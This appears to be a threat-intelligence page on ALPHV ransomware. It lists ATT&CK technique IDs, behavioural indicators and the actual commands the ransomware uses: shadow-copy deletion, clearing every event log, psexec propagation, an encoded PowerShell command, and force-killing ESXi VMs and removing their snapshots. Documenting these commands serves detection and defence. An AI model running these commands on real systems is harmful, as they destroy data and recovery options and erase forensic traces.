TTPs
- T1003.004 - OS Credential Dumping: LSA Secrets
- T1005 - Data from Local System
- T1007 - System Service Discovery
- T1021.001 - Remote Desktop Protocol (RDP)
- T1021.002 - SMB/Windows Admin Shares
- T1027 - Obfuscated Files or Information
- T1027.002 - Obfuscated Files or Information: Software Packing
- T1047 - Windows Management Instrumentation
- T1049 - System Network Connections Discovery
- T1053.003 - Command and Scripting Interpreter: Windows Command Shell
- T1057 - Process Discovery
- T1059 - Command and Scripting Interpreter
- T1078 - Valid Accounts
- T1082 - System Information Discovery
- T1083 - File and Directory Discovery
- T1090.003 - Multi-hop Proxy
- T1105 - Ingress Tool Transfer
- T1112 - Modify Registry
- T1129 - Shared Modules
- T1140 - Deobfuscate/Decode Files or Information
- T1202 - Indirect Command Execution
- T1218.003 - Signed Binary Proxy Execution: CMSTP
- T1485 - Data Destruction
- T1486 - Data Encrypted for Impact
- T1489 - Service Stop
- T1490 - Inhibit System Recovery
- T1498 - Network Denial of Service
- T1499 - Endpoint Denial of Service
- T1531 - Account Access Removal
- T1543.003 - Create or Modify System Process: Windows Service
- T1550.002 - Use Alternate Authentication Material: Pass the Hash
- T1552 - Unsecured Credentials
- T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
- T1560 - Archive Collected Data
- T1562.001 - Impar Defenses: Disable or Modify Tools
- T1567.002 - Exfiltration to Cloud Storage
- T1569.002 - System Service: Service execution
- T1570 - Lateral Tool Transfer
- Suspicious SMB traffic
- 'vssadmin' shadow copy deletions
- Recovery mode edits or disables using 'bcedit.exe'
- Propagation via 'psexec'
- Use of anti-forensics tools like fileshredder
- Collection machine UUID via WMIC commands
- The universally unique identifier (UUID) is later used, together with the token, to identify the victim in a Tor website hosted by the malicious actors.
- Delete volume shadow copies.
- Increase the number of network requests that the server service can perform.
- Stop the IIS service using the iisreset.exe, a well-known tool used to handle IIS services.
- Execute arp command to display current ARP (Address Resolution Protocol) entries.
- Execute Fsutil to allow the use of both remote and local symlinks.
- Clear all event logs via wevutil.exe.
cmd /c wmic csproduct get UUID
vssadmin.exe delete shadows /all /quiet
powershell.exe -nop -exec bypass -EncodedCommand LgBcAHMAcAByAGUAYQBkAC4AYgBhAHQAIABtAGsAcwBoAGEAcgBlACAAUgBFAEEARAA=
icacls c:\windows\debug\app /grant "Authenticated Users":(OI)(CI)F /T
net share app)c:\windows\debug\app /grant:everyone,READ
fsutil behavior set SymlinkEvaluation R2L:1
fsutil behavior set SymlinkEvaluation R2R:1
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f
psexec.exe -accepteula \\<TARGET_HOST> -u <USERNAME> -p <PASSWORD> -s -d -f -c <ALPHV_EXECUTABLE> [FLAGS] [OPTIONS] --access-token <ACCESS_TOKEN> [SUBCOMMAND]
arp -a
%SYSTEM32%\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\""
/c \\DOMAIN.LOCAL \netlogon\locker.exe --access-token CODE
gpupdate /force
esxcli --formatter=csv --format-param=fields=="WorldID,DisplayName" vm process list
awk -F "\"*,\"*" '{system("esxcli vm process kill --type=force --world-id="$1)}'
for i in `vim-cmd vmsvc/getallvms| awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i & done
Last modified 9mo ago